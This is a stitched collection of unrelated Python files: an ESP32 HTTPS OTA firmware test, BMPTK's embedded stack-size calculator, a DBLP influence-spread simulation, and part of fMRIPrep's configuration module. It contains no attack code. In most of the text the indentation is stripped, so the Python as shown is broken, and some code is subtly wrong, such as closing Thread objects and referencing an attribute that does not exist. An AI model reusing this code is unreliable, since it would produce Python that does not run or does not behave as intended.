steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
    # Port to which the request should be redirected
redirection_server_port = 8081
# File to be downloaded. This file is generated after compilation
bin_name = "advanced_https_ota.bin"
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
thread2 = Thread(target=start_redirect_server, args=(dut1.app.binary_path, host_ip, redirection_server_port, server_port))
thread2.daemon = True
thread2.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.close()
thread2.close()
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(redirection_server_port) + "/" + bin_name))
dut1.write("https://" + host_ip + ":" + str(redirection_server_port) + "/" + bin_name)
dut1.expect("Loaded app from partition at offset", timeout=60)
dut1.expect("Starting Advanced OTA example", timeout=30)
dut1.reset()
if __name__ == '__main__':
test_examples_protocol_advanced_https_ota_example()
test_examples_protocol_advanced_https_ota_example_chunked()
test_examples_protocol_advanced_https_ota_example_redirect_url()
test_examples_protocol_advanced_https_ota_example_truncated_bin()
test_examples_protocol_advanced_https_ota_example_truncated_header()
test_examples_protocol_advanced_https_ota_example_random()
|
bmptk-ssc.py
|
# ===========================================================================
#
# BMPTK's Stack Size Calculator:
# calculate the stack use from an .lss file
#
# (c) Wouter van Ooijen (wouter@voti.nl)
# 2015-12-18 version 0.1 work-in-progress
# license: Boost Software License - Version 1.0
#
# ===========================================================================
#
# Known limitations
#
# tested only on Windows
# correct lss format is assumed, not (always) checked
# hand-written asm code often causes trouble
# only a top-level unused subroutine is reported as 'never called'
# only a few simple sp-changing sequences are supported
# (and not fully checked)
#
# ===========================================================================
#
# ToDo list
#
#    warn on imbalance
#    what to do with a routine that just jumps to itself? like __aeabi_idiv0
# test recursion, virtuals
# avr __bad_interrupt chained to main??
#
# ===========================================================================
from __future__ import print_function
import operator, subprocess, sys, os, argparse, threading
def demangle( filt, name ):
    "de-mangle a C++ function name using the c++filt tool"
if filt:
return subprocess.check_output( [ filt , name] ).decode("utf-8").strip()
else:
return name
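# Illustration only (the exact output depends on the c++filt binary passed in):
# demangle("c++filt", "_Z4keepv") would typically return something like "keep()".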
def file_from_text( file_name, text ):
"write the string text to the file_name"
f = open( file_name, "w" )
f.write( text )
f.close()
def text_from_file( file_name ):
"return the text in the file"
f = open( file_name, "r" )
result = f.read()
f.close()
return result
def replace_extension( file_name, extension ):
"replace the extension of file_name as indicated"
return os.path.splitext( file_name )[0] + '.' + extension
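# e.g. replace_extension("firmware.lss", "c") -> "firmware.c"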
def signed( x ):
"return a signed value from an unsigned 32-bit 'bit pattern'"
if x >= 2**31:
x = x - 2**32
return x
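# e.g. signed(0xFFFFFFFF) == -1, while signed(0x7FFFFFFF) == 2147483647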
def remove( s, x ):
    "return s with all occurrences of a char that appears in x removed"
for c in x:
s = s.replace( c, "" )
return s
def replace( s, x, y ):
    "return s with all occurrences of a char that appears in x replaced by y"
for c in x:
s = s.replace( c, y )
return s
def label( line ):
"return the text enclosed in <> brackets"
return ( line + '<' ).split( '<' )[ 1 ].split( '>' )[ 0 ]
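# e.g. label("8: bl 20 <main>") -> "main"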
def stripquotes( line ):
"remove surrounding quotes from a line"
line = line.strip()
if( line + " " )[ 0 ] in "\"'":
return line.strip( line[ 0 ] )
else:
return line
# ===========================================================================
class problem:
"a problem that can be related to a specific .lss line"
def __init__( self, line_nr, text, fatal = 1 ):
self.line_nr = line_nr
self.text = "[%4d] %s" % ( line_nr, text )
self.fatal = fatal
def print( self, stop = 1 ):
if self.fatal:
print( "FATAL " + self.text, file = sys.stderr )
if stop:
exit( -1 )
else:
print( "WARNING " + self.text, file = sys.stderr )
# ===========================================================================
class assembler_line:
"an lss assembler line (not being an empty line, label, etc.)"
def __init__( self, cpu, line, line_nr, subroutine ):
self.cpu = cpu
self.line = line
self.line_nr = line_nr
self.subroutine = subroutine
self.call = 0
self.extra = 0
self.is_call = 0
self.is_data = 0
self.my_problems = []
self.target = None
# de-code the line a bit
# address opcode arguments
# 20: 22fa movs r2, #250 ; 0xfa
if 0: print( line )
line = line.strip() + "\t\t"
self.address = line.split( ":" )[ 0 ]
self.opcode = line.split( "\t" )[ 2 ]
self.arguments = line.split( "\t", 3 )[ 3 ]
self.arguments = remove( self.arguments, "{} ;([" ).rstrip( '\t' )
self.arguments = replace( self.arguments, "\t<", "," ).split( "," )
# 67d: 74206948 65726568 7c000000 Hi there...
if ( line.count( "\t" ) == 3 ) or ( self.opcode.startswith( "." )):
self.is_instruction = 0
if self.opcode == ".word":
# address opcode arguments
# 4: 00000051 .word 0x00000051
self.is_data = 1
self.value = signed( int( self.arguments[ 0 ], 0 ) )
return
self.is_instruction = 1
def problem( self, s, fatal = 1 ):
self.my_problems.append(
problem(
self.line_nr, "[%s] %s" %
( self.subroutine.name_demangled, s ),
fatal ) )
def parse( self, level ):
self.level = level
self.delta = 0
if not self.is_instruction:
return
# save register values at entry
self.old_registers = self.subroutine.registers.copy()
if self.cpu == "msp430":
self.parse_msp430()
elif self.cpu == "avr":
self.parse_avr()
elif self.cpu == "cortex":
self.parse_cortex();
else:
print( "unknown cpu [%s]" % self.cpu )
exit( -1 )
self.level += self.delta
def parse_msp430( self ):
# invalidate any value stored for the destination register
if len( self.arguments ) > 0:
target = self.arguments[ 0 ]
if target in self.subroutine.registers:
del self.subroutine.registers[ target ]
return
def parse_avr( self ):
# invalidate any value stored for the destination register
if len( self.arguments ) > 0:
target = self.arguments[ 0 ]
if target in self.subroutine.registers:
del self.subroutine.registers[ target ]
value = ( self.line + ';' ).split( ';' )[ 1 ]
if self.opcode == "push":
self.delta = +1
elif self.opcode == "pop":
self.delta = -1
elif (
( self.opcode == "rcall" )
and ( self.arguments[ 0 ] == ".+0" )
):
# rcall .+0
self.delta = +2
elif self.opcode == "call":
# call 0x96 ; 0x96 <main>
self.target = self.line.split( '<' )[ 1 ].split( '>' )[ 0 ]
self.extra = 2
self.is_call = 1
elif self.opcode == "in":
# in r28, 0x3d ; 61
if int( value ) == 61:
# pretend that the target is a 16-bit register
self.subroutine.registers[ target ] = - self.level
elif self.opcode == "sbiw":
# sbiw r28, 0x0e ; 14
if target in self.old_registers:
# pretend that the register is 16 bits
self.subroutine.registers[ target ] = \
self.old_registers[ target ] - int( value )
elif self.opcode == "adiw":
# adiw r28, 0x0e ; 14
print( self.line )
print( self.old_registers )
if target in self.old_registers:
# pretend that the register is 16 bits
print( self.old_registers[ target ] + int( value ) )
self.subroutine.registers[ target ] = \
self.old_registers[ target ] + int( value )
elif self.opcode == "out":
# out 0x3d, r28 ; 61
if int( value ) == 61:
source = self.arguments[ 1 ]
if source in self.old_registers:
# stack grows down
self.delta = ( - self.old_registers[ source ] ) - self.level
else:
if self.subroutine.name != "__vectors":
# stack is set to its initial value in __vectors
self.my_problems.append( problem(
self.line_nr, "register %s value unknown" % source ) )
return
    def parse_cortex( self ):
        "second pass: parse() must be called once for each instruction, in order"
self.opcode = self.opcode \
.replace( "add.w", "addw" ) \
.replace( "sub.w", "subw" )
# invalidate the value stored in the target register
if self.opcode != "str":
target = self.arguments[ 0 ]
if target in self.subroutine.registers:
del self.subroutine.registers[ target ]
if self.opcode == "bl":
self.target = self.line.split( '<' )[ 1 ].split( '>' )[ 0 ]
self.is_call = 1
if self.opcode == "b.n":
self.target = self.line.split( '<' )[ 1 ].split( '>' )[ 0 ]
if self.target.find( "+" ) == -1:
self.is_call = 1
elif self.opcode == "blx":
reg = self.arguments[ 0 ]
d = self.old_registers.get( reg, None )
if ( d != None ) and ( d == 0x1FFF1FF1 ):
# call to ROM IAP, ignore
self.problem( "IAP call, assumed to use no stack space", 0 )
else:
self.problem( "indirect call" )
elif self.opcode.startswith( "mov" ):
# movs r3, #250 ; 0xfa
if self.arguments[ 1 ].startswith( "#" ):
self.subroutine.registers[ self.arguments[ 0 ] ] = \
int( self.arguments[ 1 ][ 1: ] )
elif self.opcode.startswith( "lsl" ):
# lsls r3, r3, #4
if self.arguments[ 1 ].startswith( "r" ) \
and ( len( self.arguments ) > 2 ) \
and self.arguments[ 1 ] in self.old_registers \
and self.arguments[ 2 ].startswith( "#" ):
self.subroutine.registers[ self.arguments[ 0 ] ] = \
self.old_registers[ self.arguments[ 1 ] ] * \
( 2 ** int( self.arguments[ 2 ][ 1 : ] ) )
elif self.opcode == "push":
# push {r7, lr}
self.delta = 4 * len( self.arguments )
elif self.opcode == "pop":
# push {r7, pc}
self.delta = - 4 * len( self.arguments )
elif self.opcode == "ldr" \
and ( self.arguments[ 1 ] == "pc" ):
# ldr r7, [pc, #24] ; (40 <_Z4keepv+0x20>)
self.subroutine.registers[ self.arguments[ 0 ] ] = \
self.subroutine.data[ int( self.arguments[ 3 ], 16 ) ]
elif ( self.opcode in ( "addw", "subw" ) ) \
and ( len( self.arguments ) >= 3 ) \
and ( self.arguments[ 0 ] == "sp" ) \
and ( self.arguments[ 1 ] == "sp" ):
if self.arguments[ 2 ].startswith( "#" ):
# subw sp, sp, #1756 ; 0x6dc
self.delta = int( self.arguments[ 2 ][ 1: ] )
if self.opcode == "addw":
# stack grows down: add decreases stack use
self.delta = - self.delta
elif ( self.opcode in ( "add", "sub" ) ) \
and ( len( self.arguments ) >= 2 ) \
and ( self.arguments[ 0 ] == "sp" ):
if self.arguments[ 1 ].startswith( "#" ):
# sub sp, #404 ; 0x194
self.delta = int( self.arguments[ 1 ][ 1: ] )
elif self.arguments[ 1 ].startswith( "r" ):
# add sp, r3
reg = self.arguments[ 1 ]
d = self.old_registers.get( reg, None )
if d == None:
self.my_problems.append( problem(
self.line_nr, "register %s value unknown" % reg ) )
else:
self.delta = d
else:
self.my_problems.append( problem(
self.line_nr, "format not recognized" ) )
if self.opcode == "add":
# stack grows down: add decreases stack use
self.delta = - self.delta
elif self.arguments[ : 1 ].count( "sp" ):
self.my_problems.append( problem( self.line_nr, "sp as argument" ) )
else:
pass
def __str__( self ):
return "[%6d:%6d:%6d:%6d:%6d] %s" % (
self.delta, self.level, self.extra,
self.call, self.total, self.line
)
# ===========================================================================
class subroutine:
"a single assembler subroutine"
# stack administration for each instruction:
# delta = change in stack use caused by the instruction
# eg: push = +1 (avr) or +4 (cortex)
# base = stack use at the start of the instruction
# = running total of delta's
# extra = temporary stack during execution of the instruction itself
# eg: call = +2 (avr), but bl = 0 (cortex)
# call = stack use of the routine called by this instruction
# peak = peak stack use during execution of the instruction
# and/or the called subroutine
# The stack use of a subroutine is the highest peak of all its instructions.
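    # A minimal worked example (cortex; the callee's stack use of 24 bytes is an
    # assumed, illustrative number):
    #   push {r7, lr}   delta = +8   running level after it =  8   peak =  8
    #   bl   <foo>      delta =  0   running level after it =  8   peak = 32  (8 + callee's 24)
    #   pop  {r7, pc}   delta = -8   running level after it =  0   peak =  0
    # The subroutine's stack use is the highest peak, here 32 bytes.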
def __init__( self, cpu, subroutines, filt ):
self.name = None
self.name_demangled = None
self.calc_stack_use = None
self.line_nr = -1
self.lines = []
self.my_problems = []
self.cpu = cpu
self.subroutines = subroutines
self.data = {}
self.registers = {}
self.instructions = 0
self.called = 0
self.is_root = 0
self.filt = filt
self.level = 0
def add( self, line, line_nr ):
"add a single lss line to the subroutine"
if( line[ 0 ] != " " ):
# subroutine label?
if self.name == None:
self.line_nr = line_nr
self.name = line.split( '<' )[ 1 ].split( '>' )[ 0 ]
self.name_demangled = demangle( self.filt, self.name )
else:
decoded_line = assembler_line( self.cpu, line, line_nr, self )
self.lines.append( decoded_line )
self.instructions += decoded_line.is_instruction
if decoded_line.is_data:
self.data[ int( decoded_line.address, 16 ) ] = int( decoded_line.value )
def parse( self ):
"is called once (by stack_use) to parse the subroutine"
level = 0
for line in self.lines:
line.parse( level )
level = line.level
self.my_problems.extend( line.my_problems )
def stack_use( self ):
if self.calc_stack_use == None:
self.parse()
self.calc_stack_use = 0
for line in self.lines:
line.call = 0
if line.is_call:
if line.target in self.subroutines:
target = self.subroutines[ line.target ]
target.called += 1
line.call = target.stack_use()
else:
self.my_problems.append(
problem( self.line_nr,
"target [%s] unknown" % line.target ))
line.total = line.level + line.extra + line.call
self.calc_stack_use = max ( self.calc_stack_use, line.total )
return self.calc_stack_use
def __str__( self ):
all = ''
all += "[%4d] : %s\n" % ( self.line_nr, self.name_demangled )
all += " %s\n" % self.name
all += " called: %d stack use: %d\n" % ( self.called, self.stack_use() )
all += " delta base extra call peak\n"
for line in self.lines:
all += " %s\n" % line
return all
# ===========================================================================
class application:
    "the application info as read from a .lss file"
def __init__( self, cpu, file_name, root_names, filt ):
self.cpu = cpu
self.root_names = root_names
self.my_problems = []
self.subroutines = {}
if self.cpu == "msp430" :
self.non_breaking_labels = [
"__crt0_init_bss",
"__crt0_call_init_then_main",
"_msp430_run_init_array",
"_msp430_run_preinit_array",
"_msp430_run_fini_array",
"_msp430_run_array",
"_msp430_run_done",
"register_tm_clones",
"__do_global_dtors_aux",
]
self.known_not_called = [
]
elif self.cpu == "avr" :
self.non_breaking_labels = [
"__ctors_end",
"__do_copy_data",
"__do_clear_bss",
".do_clear_bss_loop",
".do_clear_bss_start",
]
self.known_not_called = [
"__bad_interrupt",
"_exit",
"__stop_program",
]
elif self.cpu == "cortex":
self.non_breaking_labels = [
]
self.known_not_called = [
]
else:
print( "unknown cpu [%s]" % self.cpu )
exit( -1 )
f = open( file_name, "r" )
next = subroutine( cpu, self.subroutines, filt )
line_nr = 0
for line in f.readlines():
line = line.replace( "\n", '' )
line_nr += 1
# print( "[%s]" % line )
if line == "":
pass
elif ( line[ 0 ] == "0" ) \
and not ( label( line ) in self.non_breaking_labels ) \
and not self.msp430_ignore( label( line )) \
and next.name != None :
self.subroutines[ next.name ] = next
next = subroutine( cpu, self.subroutines, filt )
next.add( line, line_nr )
elif( line[ 0 ] in " 0" ):
next.add( line, line_nr )
else:
pass
self.subroutines[ next.name ] = next
for name in self.root_names:
self.mark_as_root( name )
def msp430_ignore( self, label ):
return (
( label[ 0 ] == '.' )
or ( label == "L0\1" ))
def mark_as_root( self, name ):
if name in self.subroutines:
self.subroutines[ name ].called += 1
self.subroutines[ name ].is_root = 1
else:
self.my_problems.append(
problem( 0, "root [%s] not found" % name, 1 ))
def problems( self ):
if self.my_problems == []:
for name, subroutine in sorted( self.subroutines.items() ):
if ( subroutine.level != 0 ):
problem( subroutine.line_nr,
"[%s] has a non-0 stack delta" % subroutine.name_demangled, 0 )
if ( subroutine.called == 0 ) \
and ( subroutine.instructions > 0 ) \
and not ( subroutine.name in self.known_not_called ):
self.my_problems.append(
problem( subroutine.line_nr,
"[%s] is never called" % subroutine.name_demangled, 0 ))
self.my_problems.extend( subroutine.my_problems )
return self.my_problems
def stack_use( self, name ):
if name in self.subroutines:
return self.subroutines[ name ].stack_use()
else:
self.my_problems.append( problem( 0,
( "root [%s] not found" % name ), 1 ))
return 0
def expanded_call_tree_view( self, name, prefix = "", step = " " ):
all = ""
all += prefix + name
        for call in self.subroutines[ name ].calls:
            all += self.expanded_call_tree_view(
                call.target, prefix + step, step )
return all
def annotated_view( self ):
all = ""
for name in self.root_names:
all += "[%s] uses %d stack bytes\n" % ( name, self.stack_use( name ) )
all += "\n"
for name, subroutine in sorted( self.subroutines.items() ):
all += str( subroutine ) + "\n"
return all
def subroutines_list( self ):
all = []
        for name, subroutine in sorted( self.subroutines.items() ):
all.append( name )
return all
def handle_problems( self, abort = 1 ):
px = self.problems()
fatals = 0
if len( px ):
for p in px:
p.print( 0 );
if p.fatal:
fatals += 1
if fatals and abort:
print( "%d fatal problems found\n" % fatals )
exit( -1 )
# ===========================================================================
def arguments_parser():
parser = argparse.ArgumentParser(
description = \
            'Calculate the required stack size from an .lss file. '
            'By default, a file bmptk_culated_size_stack.c is created '
'that contains one line:\n'
' unsigned char bmptk_stack[ 40 ] '
'\__attribute__ ((section(".bmptk_stack")));'
)
parser.add_argument(
'cpu',
#type = string,
help = 'target cpu: cortex, avr, msp430' )
parser.add_argument(
'root',
help = 'root function for which the stack size is calculated' )
parser.add_argument(
'input_file',
help = '.lss input file' )
parser.add_argument(
'template',
help = 'The file that is copied to the generated stack output_file. '
'Any ocurrence of STACK_SIZE is replaced by the calculated stack size.' )
parser.add_argument(
'output_file',
help = 'The name of the file to which the output (copy of the template) is written' )
parser.add_argument(
'-annotate',
help = 'create annotated version of the lss file' )
parser.add_argument(
'-filt',
help = 'FILT executable to use to demangle C++ names' )
parser.add_argument(
'-size',
type = int,
help = 'SIZE overrides the calculated stack size' )
parser.add_argument(
'-delta',
type = int,
default = 0,
help = 'DELTA is added to the calculated stack size' )
parser.add_argument(
'-verbose',
action='store_true',
help = 'show the options used' )
return parser
def analyse(
annotate, filt,
cpu, root_names, file_name,
stack_template, stack_output,
size, delta,
verbose
):
if verbose:
print( "annotate : %s" % annotate )
print( "filt tool : %s" % filt )
print( "CPU : %s" % cpu )
print( "roots : %s" % root_names )
print( "lss file : %s" % file_name )
print( "stack template : %s" % stack_template )
print( "stack file : %s" % stack_output )
print( "size override : %s" % size )
print( "size delta : %s" % delta )
app = application( cpu, file_name, root_names, filt )
if annotate:
file_from_text( annotate, app.annotated_view() )
app.handle_problems()
if size != None:
        n = size
        print( "stack size override = %d" % size )
else:
n = delta + app.stack_use( root_names[ 0 ] )
print( "stack size is %d" % n )
file_from_text(
stack_output,
stripquotes( text_from_file( stack_template ) )
.replace( 'STACK_SIZE', str( n )))
def run():
parser = arguments_parser()
results = parser.parse_args()
analyse(
results.annotate,
results.filt,
results.cpu,
[ results.root ],
results.input_file,
results.template,
results.output_file,
results.size,
results.delta,
results.verbose
)
sys.setrecursionlimit( 100000 )
threading.stack_size( 200000000 )
thread = threading.Thread( target = run )
thread.start()
|
simulate.py
|
# -*- coding: utf-8 -*-
import queue
import random
import networkx as nx
from multiprocessing import Process
import multiprocessing
influence_sum=multiprocessing.Value("i",0)
def process():
influence = 0
for i in range(0, 50):
influence += simulate(set(seedset[:]))
with influence_sum.get_lock():
influence_sum.value += influence
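# simulate() below runs one independent-cascade style diffusion: the seed nodes
# start active, and each active node taken from the queue activates every still
# inactive neighbour with a fixed probability of 0.1 (the stored edge weights
# are not used); the return value is the total number of activated nodes.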
def simulate(seedset):
active = []
for i in range (0, g.number_of_nodes()):
active.append(0)
simul_inf = 0
q1 = queue.Queue()
k1 = len(seedset)
for it in seedset:
q1.put(it)
active[it] = 1
simul_inf += 1
while q1.qsize() != 0:
expend = q1.get()
for neigh in g[expend]:
randDouble = random.random()
if randDouble > 0.1:
continue
if active[neigh] == 1:
continue
if active[neigh] !=1:
active[neigh] = 1
q1.put(neigh)
simul_inf += 1
return simul_inf
g = nx.Graph()
for line in open("DBLP-new.txt"):
line = line.split()
g.add_edge(int(line[0]), int(line[1]), weight = float(line[2]))
seedset="3335 3344 166 14689 13940 30094 864 3297 13841 13810 15325 3325 3345 1826 1832 13952 44 7226 2485 27137 6318 35861 1447 3399 1817 9400 17110 3299 2005 7006 9799 10277 13931 6325 1196 2976 66101 6327 7437 8622 28674 60436 2545 6317 2911 4298 1499 2142 7429 67246"
seedset = seedset.split(' ')
seedset=list(map(int,seedset))
process_list = []
for j in range(20):
process_list.append(Process(target=process))
process_list[-1].start()
for p in process_list:
p.join()
print('influence = '+str(influence_sum.value/1000))
|
config.py
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
r"""
A Python module to maintain unique, run-wide *fMRIPrep* settings.
This module implements the memory structures to keep a consistent, singleton config.
Settings are passed across processes via filesystem, and a copy of the settings for
each run and subject is left under
``<fmriprep_dir>/sub-<participant_id>/log/<run_unique_id>/fmriprep.toml``.
Settings are stored using :abbr:`TOML (Tom's Obvious, Minimal Language)`.
The module has a :py:func:`~fmriprep.config.to_filename` function to allow writing out
the settings to hard disk in *ToML* format, which looks like:
.. literalinclude:: ../fmriprep/data/tests/config.toml
:language: toml
:name: fmriprep.toml
:caption: **Example file representation of fMRIPrep settings**.
This config file is used to pass the settings across processes,
using the :py:func:`~fmriprep.config.load` function.
Configuration sections
----------------------
.. autoclass:: environment
:members:
.. autoclass:: execution
:members:
.. autoclass:: workflow
:members:
.. autoclass:: nipype
:members:
Usage
-----
A config file is used to pass settings and collect information as the execution
graph is built across processes.
.. code-block:: Python
from fmriprep import config
config_file = config.execution.work_dir / '.fmriprep.toml'
config.to_filename(config_file)
# Call build_workflow(config_file, retval) in a subprocess
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
config.load(config_file)
# Access configs from any code section as:
value = config.section.setting
Logging
-------
.. autoclass:: loggers
:members:
Other responsibilities
----------------------
The :py:mod:`config` is responsible for other convenience actions.
* Switching Python's :obj:`multiprocessing` to *forkserver* mode.
* Set up a filter for warnings as early as possible.
* Automated I/O magic operations. Some conversions need to happen in the
store/load processes (e.g., from/to :obj:`~pathlib.Path` \<-\> :obj:`str`,
:py:class:`~bids.layout.BIDSLayout`, etc.)
"""
import os
from multiprocessing import set_start_method
# Disable NiPype etelemetry always
_disable_et = bool(
os.getenv("NO_ET") is not None or os.getenv("NIPYPE_NO_ET") is not None
)
os.environ["NIPYPE_NO_ET"] = "1"
os.environ["NO_ET"] = "1"
CONFIG_FILENAME = "fmriprep.toml"
try:
set_start_method("forkserver")
except RuntimeError:
pass # context has been already set
finally:
# Defer all custom import for after initializing the forkserver and
# ignoring the most annoying warnings
import sys
import random
from uuid import uuid4
from time import strftime
from pathlib import Path
from nipype import __version__ as _nipype_ver
from templateflow import __version__ as _tf_ver
from . import __version__
if not hasattr(sys, "_is_pytest_session"):
sys._is_pytest_session = False # Trick to avoid sklearn's FutureWarnings
# Disable all warnings in main and children processes only on production versions
if not any(
(
"+" in __version__,
__version__.endswith(".dirty"),
os.getenv("FMRIPREP_DEV", "0").lower() in ("1", "on", "true", "y", "yes"),
)
):
from ._warnings import logging
os.environ["PYTHONWARNINGS"] = "ignore"
elif os.getenv("FMRIPREP_WARNINGS", "0").lower() in ("1", "on", "true", "y", "yes"):
# allow disabling warnings on development versions
# https://github.com/nipreps/fmriprep/pull/2080#discussion_r409118765
from ._warnings import logging
else:
import logging
logging.addLevelName(25, "IMPORTANT") # Add a new level between INFO and WARNING
logging.addLevelName(15, "VERBOSE") # Add a new level between INFO and DEBUG
DEFAULT_MEMORY_MIN_GB = 0.01
# Ping NiPype eTelemetry once if env var was not set
# workers on the pool will have the env variable set from the master process
if not _disable_et:
# Just get so analytics track one hit
from contextlib import suppress
from requests import get as _get_url, ConnectionError, ReadTimeout
with suppress((ConnectionError, ReadTimeout)):
_get_url("https://rig.mit.edu/et/projects/nipy/nipype", timeout=0.05)
# Execution environment
_exec_env = os.name
_docker_ver = None
# special variable set in the container
if os.getenv("IS_DOCKER_8395080871"):
_exec_env = "singularity"
_cgroup = Path("/proc/1/cgroup")
if _cgroup.exists() and "docker" in _cgroup.read_text():
_docker_ver = os.getenv("DOCKER_VERSION_8395080871")
_exec_env = "fmriprep-docker" if _docker_ver else "docker"
del _cgroup
_fs_license = os.getenv("FS_LICENSE")
if not _fs_license and os.getenv("FREESURFER_HOME"):
_fs_home = os.getenv("FREESURFER_HOME")
if _fs_home and (Path(_fs_home) / "license.txt").is_file():
_fs_license = str(Path(_fs_home) / "license.txt")
del _fs_home
_templateflow_home = Path(
os.getenv(
"TEMPLATEFLOW_HOME", os.path.join(os.getenv("HOME"), ".cache", "templateflow")
)
)
try:
from psutil import virtual_memory
_free_mem_at_start = round(virtual_memory().free / 1024 ** 3, 1)
except Exception:
_free_mem_at_start = None
_oc_limit = "n/a"
_oc_policy = "n/a"
try:
# Memory policy may have a large effect on types of errors experienced
_proc_oc_path = Path("/proc/sys/vm/overcommit_memory")
if _proc_oc_path.exists():
_oc_policy = {"0": "heuristic", "1": "always", "2": "never"}.get(
_proc_oc_path.read_text().strip(), "unknown"
)
if _oc_policy != "never":
_proc_oc_kbytes = Path("/proc/sys/vm/overcommit_kbytes")
if _proc_oc_kbytes.exists():
_oc_limit = _proc_oc_kbytes.read_text().strip()
if (
_oc_limit in ("0", "n/a")
and Path("/proc/sys/vm/overcommit_ratio").exists()
):
_oc_limit = "{}%".format(
Path("/proc/sys/vm/overcommit_ratio").read_text().strip()
)
except Exception:
pass
# Debug modes are names that influence the exposure of internal details to
# the user, either through additional derivatives or increased verbosity
DEBUG_MODES = ("compcor",)
class _Config:
"""An abstract class forbidding instantiation."""
_paths = tuple()
def __init__(self):
"""Avert instantiation."""
raise RuntimeError("Configuration type is not instantiable.")
@classmethod
def load(cls, settings, init=True, ignore=None):
"""Store settings from a dictionary."""
ignore = ignore or {}
for k, v in settings.items():
if k in ignore or v is None:
continue
if k in cls._paths:
setattr(cls, k, Path(v).absolute())
elif hasattr(cls, k):
setattr(cls, k, v)
if init:
try:
cls.init()
except AttributeError:
pass
@classmethod
def get(cls):
"""Return defined settings."""
from niworkflows.utils.spaces import SpatialReferences, Reference
out = {}
for k, v in cls.__dict__.items():
if k.startswith("_") or v is None:
continue
if callable(getattr(cls, k)):
continue
if k in cls._paths:
v = str(v)
if isinstance(v, SpatialReferences):
v = " ".join([str(s) for s in v.references]) or None
if isinstance(v, Reference):
v = str(v) or None
out[k] = v
return out
class environment(_Config):
"""
Read-only options regarding the platform and environment.
Crawls runtime descriptive settings (e.g., default FreeSurfer license,
execution environment, nipype and *fMRIPrep* versions, etc.).
The ``environment`` section is not loaded in from file,
only written out when settings are exported.
This config section is useful when reporting issues,
and these variables are tracked whenever the user does not
opt-out using the ``--notrack`` argument.
"""
cpu_count = os.cpu_count()
"""Number of available CPUs."""
exec_docker_version = _docker_ver
"""Version of Docker Engine."""
exec_env = _exec_env
"""A string representing the execution platform."""
free_mem = _free_mem_at_start
"""Free memory at start."""
overcommit_policy = _oc_policy
"""Linux's kernel virtual memory overcommit policy."""
overcommit_limit = _oc_limit
"""Linux's kernel virtual memory overcommit limits."""
nipype_version = _nipype_ver
"""Nipype's current version."""
templateflow_version = _tf_ver
"""The TemplateFlow client version installed."""
version = __version__
"""*fMRIPrep*'s version."""
class nipype(_Config):
"""Nipype settings."""
crashfile_format = "txt"
"""The file format for crashfiles, either text or pickle."""
get_linked_libs = False
"""Run NiPype's tool to enlist linked libraries for every interface."""
memory_gb = None
"""Estimation in GB of the RAM this workflow can allocate at any given time."""
nprocs = os.cpu_count()
"""Number of processes (compute tasks) that can be run in parallel (multiprocessing only)."""
omp_nthreads = None
"""Number of CPUs a single process can access for multithreaded execution."""
plugin = "MultiProc"
"""NiPype's execution plugin."""
plugin_args = {
"maxtasksperchild": 1,
"raise_insufficient": False,
}
"""Settings for NiPype's execution plugin."""
resource_monitor = False
"""Enable resource monitor."""
stop_on_first_crash = True
"""Whether the workflow should stop or continue after the first error."""
@classmethod
def get_plugin(cls):
"""Format a dictionary for Nipype consumption."""
out = {
"plugin": cls.plugin,
"plugin_args": cls.plugin_args,
}
if cls.plugin in ("MultiProc", "LegacyMultiProc"):
out["plugin_args"]["n_procs"] = int(cls.nprocs)
if cls.memory_gb:
out["plugin_args"]["memory_gb"] = float(cls.memory_gb)
return out
@classmethod
def init(cls):
"""Set NiPype configurations."""
from nipype import config as ncfg
# Configure resource_monitor
if cls.resource_monitor:
ncfg.update_config(
{
"monitoring": {
"enabled": cls.resource_monitor,
"sample_frequency": "0.5",
"summary_append": True,
}
}
)
ncfg.enable_resource_monitor()
# Nipype config (logs and execution)
ncfg.update_config(
{
"execution": {
"crashdump_dir": str(execution.log_dir),
"crashfile_format": cls.crashfile_format,
"get_linked_libs": cls.get_linked_libs,
"stop_on_first_crash": cls.stop_on_first_crash,
"check_version": False, # disable future telemetry
}
}
)
if cls.omp_nthreads is None:
cls.omp_nthreads = min(
cls.nprocs - 1 if cls.nprocs > 1 else os.cpu_count(), 8
)
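# Minimal sketch (not part of fMRIPrep) of how the dictionary produced by
# ``nipype.get_plugin()`` is typically consumed: Nipype's ``Workflow.run`` accepts
# ``plugin`` and ``plugin_args`` keyword arguments. The workflow built here is a
# hypothetical placeholder with a single no-op node.
def _example_run_with_plugin_settings():
    import nipype.pipeline.engine as pe
    import nipype.interfaces.utility as niu

    wf = pe.Workflow(name="example_wf")  # hypothetical, otherwise empty workflow
    wf.add_nodes([pe.Node(niu.IdentityInterface(fields=["x"]), name="noop")])
    plugin_settings = nipype.get_plugin()
    # e.g. {"plugin": "MultiProc", "plugin_args": {"maxtasksperchild": 1, ..., "n_procs": N}}
    return wf.run(**plugin_settings)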
class execution(_Config):
"""Configure run-level settings."""
anat_derivatives = None
"""A path where anatomical derivatives are found to fast-track *sMRIPrep*."""
bids_dir = None
"""An existing path to the dataset, which must be BIDS-compliant."""
bids_database_dir = None
"""Path to the directory containing SQLite database indices for the input BIDS dataset."""
bids_description_hash = None
"""Checksum (SHA256) of the ``dataset_description.json`` of the BIDS dataset."""
bids_filters = None
"""A dictionary of BIDS selection filters."""
boilerplate_only = False
"""Only generate a boilerplate."""
